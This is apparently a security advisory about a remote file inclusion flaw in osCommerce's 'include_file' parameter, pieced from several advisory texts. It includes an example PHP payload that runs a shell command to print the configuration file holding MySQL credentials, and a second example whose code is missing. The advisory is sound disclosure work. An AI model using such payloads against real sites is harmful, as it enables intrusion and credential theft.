Reportedly, exploitation of this type of vulnerability is not possible unless both 'allow_url_fopen' and 'register_globals' are enabled in the local site PHP configuration. It is good practice to disable any unneeded options. Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: firstname.lastname@example.org .
osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver.
-------- Example 1 --------
--- a.php ---
Output: dir listing of the current dierctory
-------- Example 2 --------
--- b.php ---
<? passthru("/bin/cat application_top.php")?>
Output: outputs the application_top.php file wich includes MySQL username,
osCommerce contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'include_once.php' script not properly sanitizing user input supplied to the 'include_file' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.